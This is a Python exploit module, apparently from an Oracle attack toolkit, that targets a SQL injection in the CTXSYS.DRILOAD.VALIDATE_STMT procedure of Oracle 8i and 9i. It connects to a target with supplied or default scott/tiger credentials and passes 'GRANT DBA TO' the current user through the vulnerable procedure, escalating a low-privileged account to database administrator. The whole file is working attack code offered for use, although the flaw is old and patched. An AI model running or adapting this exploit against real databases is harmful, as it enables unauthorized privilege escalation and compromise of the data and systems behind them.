#!/usr/bin/python

#
# Exploit for Oracle9i and Oracle8i prior to Alert 68
#
# Privileges needed:
#
#	- CREATE SESSION
#
# Copyright (c) 2005, 2006, 2007 Joxean Koret
#

import os
import sys
import time
import socket

import cx_Oracle

sys.path.append("../../lib")
sys.path.append("../lib")
sys.path.append("lib")

import oracleids
import liboracleexploit

from lib.libexploit import CIngumaModule

name = "orainject7"
brief_description = "Oracle 8i/9i CTXSYS.DRILOAD.VALIDATE_STMT SQL Injection"
type = "exploit"
affects = ["Oracle 8i and 9i"]
description = """
The procedure CTXSYS.DRILOAD.VALIDATE_STMT of Oracle 8i and 9i allows the
execution of arbitrary SQL commands with the privileges of SYS (uid==0).
"""

patch = "Fixed in Alert 68"
category = "exploit"
discoverer = "Reported by NGS Software"
author = "Joxean Koret <joxeankoret@yahoo.es>"

globals = ["sid", ]

class CCtxySysDriload(CIngumaModule):

    target = ""
    waitTime = 0
    timeout = 1
    exploitType = 2
    wizard = False
    services = {}
    results = {}
    user = ""
    password = ""
    covert = 0
    sid = ""
    function = "f1"
    payload = None
    command = None
    connection = None

    def connect(self):

        link    = "%s/%s@(DESCRIPTION=(ADDRESS_LIST=(ADDRESS=(PROTOCOL=TCP)(HOST=%s)(PORT=%d)))"
        link += "(CONNECT_DATA=(SERVICE_NAME=%s)))"
        link    = link % (self.user, self.password, self.target, self.port, self.sid)

        self.connection = cx_Oracle.connect(link)
        self.connection.rollback()
        self.connection.commit()

    def readConfig(self):
        if self.user != "":
            pass # Username specified
        elif self.dict.has_key("user"):
            self.user = self.dict["user"]
        else:
            print "[!] Using default username 'scott'"
            self.user = "scott"

        if self.password != "":
            pass # Password specified
        elif self.dict.has_key("password"):
            self.password = self.dict["password"]
        else:
            print "[!] Using default password 'tiger'"
            self.password = "tiger"

        if self.sid != "":
            pass # Ignore, specified
        elif self.dict.has_key("sid"):
            self.sid = self.dict["sid"]
        else:
            print "[!] Using sid 'orcl'"
            sid = "orcl"
            self.sid = sid

    def run(self):
        self.readConfig()

        # Try connecting to the instance
        print "[+] Connecting to the instance %s/%s@%s:%s/%s" % (self.user, self.password, self.target, str(self.port), self.sid)
        self.connect()
        theCommand = ["BEGIN CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO " + self.user + "'); END;", ]
        cursor = self.connection.cursor()

        for command in theCommand:
            print "[+] Granting DBA to %s... " % self.user
            print command

            try:
                cursor.execute(command)
            except:
                print "[!] Exception:"
                print sys.exc_info()[1]

        self.connection.close()
        return False

    def printSummary(self):
        print 

